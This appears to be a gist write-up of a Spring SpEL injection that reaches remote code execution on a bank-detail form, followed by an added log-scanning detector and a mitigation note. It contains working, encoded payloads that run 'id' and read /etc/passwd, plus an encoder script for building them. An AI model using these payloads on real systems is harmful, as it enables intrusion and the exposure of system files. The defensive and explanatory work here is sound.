Created April 3, 2019 06:11
My input of abc${12*12}abc was reflected as abc144abc. Then I wanted to perform a simple id and get the result on screen. I proceeded with the following payload:
URI: /BankDetailForm?id=${T(java.lang.Runtime).getRuntime().exec('id')}
Payload: ${T(java.lang.Runtime).getRuntime().exec('id')}
After going through some Java classes I stumbled upon the following:
java.lang.Character.toString(105)
-> prints the character 'i'
Now I need to concat the letter 'd' and I'm golden. Again, concat() is a method, and I'm going to nest the Character.toString() call inside it as well.
java.lang.Character.toString(105).concat(T(java.lang.Character).toString(100))
-> prints the characters 'id'
Now crafting the final payload, I get the following:
https://<domain>/BankDetailForm?id=${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(105).concat(T(java.lang.Character).toString(100)))}
The getRuntime() method returns the runtime object which we got on screen. Now we have some sort of a Blind RCE with which we can run any commands. I wanted to go a step further and get the output on screen (just for fun). At this point I wanted to do a cat etc/passwd and print the result onto the Whitelabel Error page. This meant for every character I would need to write its ASCII equivalent in the format concat(T(java.lang.Character).toString(<ascii value>)). Wrote a quick, sloppy Python script to achieve this:
Python Script:
#!/usr/bin/env python
from __future__ import print_function
try:
    input = raw_input  # Python 2: raw_input() returns the raw string
except NameError:
    pass  # Python 3: input() already returns a str
message = input('Enter message to encode:')
print('Decoded string (in ASCII):\n')
for ch in message:
    # one concat(T(java.lang.Character).toString(<ascii>)) link per character
    print('.concat(T(java.lang.Character).toString(%s))' % ord(ch), end="")
print('\n')
Now to get the output of cat etc/passwd in the response, we will use the IOUtils class and call its toString() method. We can pass an input stream to this method and get the contents of the stream as a response.
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
The payload became quite huge. To sum up, I used the Apache IOUtils library. I converted cat etc/passwd into ASCII characters using the Character class, passed this value to the exec() method, took its input stream and passed that to the toString() method of the IOUtils class. Awesome, isn't it? I tried this on the remote box and got the following.
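Added here as a defender's example (not part of the original write-up): detection logic a practitioner can run over web-server access logs for requests of the kind shown above. It flags query strings carrying `${`, lists the SpEL `T(...)` type references they use, and rebuilds the string a chained `T(java.lang.Character).toString(n).concat(...)` evaluates to, so an analyst sees the command rather than the ASCII codes. The log lines and the `classify_uri`/`scan_log` helper names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2019:06:11:00 +0000] "GET /BankDetailForm?id=12345 HTTP/1.1" 200 512
10.0.0.9 - - [03/Apr/2019:06:12:41 +0000] "GET /BankDetailForm?id=abc%24%7B12*12%7Dabc HTTP/1.1" 500 1024
10.0.0.9 - - [03/Apr/2019:06:13:07 +0000] "GET /BankDetailForm?id=%24%7BT(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(105).concat(T(java.lang.Character).toString(100)))%7D HTTP/1.1" 500 1024
"""

REQUEST_URI_RE = re.compile(r'"(?:GET|POST|PUT|DELETE) (\S+) HTTP/')
# SpEL type reference, e.g. T(java.lang.Runtime): the building block of the payloads above.
TYPE_REF_RE = re.compile(r'\bT\(\s*[\w.]+\s*\)')
# One Character.toString(<code>) link of the concat() chain used to spell out the command.
CHAR_CODE_RE = re.compile(r'Character\)\.toString\((\d+)\)')


def decode_char_concat(expression):
    """Rebuild the string that a chained Character.toString(n).concat(...) evaluates to."""
    return "".join(chr(int(code)) for code in CHAR_CODE_RE.findall(expression))


def classify_uri(raw_uri):
    """Return a finding for a suspicious request URI, or None for a benign one."""
    uri = unquote(raw_uri)  # one level of percent-decoding; double-encoded input needs another pass
    if "${" not in uri:
        return None
    type_refs = sorted(set(TYPE_REF_RE.findall(uri)))
    return {
        "uri": uri,
        "severity": "type-reference" if type_refs else "probe",  # probe: e.g. ${12*12} only
        "type_refs": type_refs,
        "decoded_concat": decode_char_concat(uri),
    }


def scan_log(text):
    """Run classify_uri over every request line of an access log and collect the findings."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_URI_RE.search(line)
        if match:
            finding = classify_uri(match.group(1))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"], f["type_refs"], repr(f["decoded_concat"]), f["uri"])
```

Spring's own mitigation is to evaluate anything derived from request data only under SimpleEvaluationContext, which rejects T() type references; this scan is for finding the attempts in logs, not a substitute for that.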
Thanks, I was blowing my mind trying to figure it out. Great explanation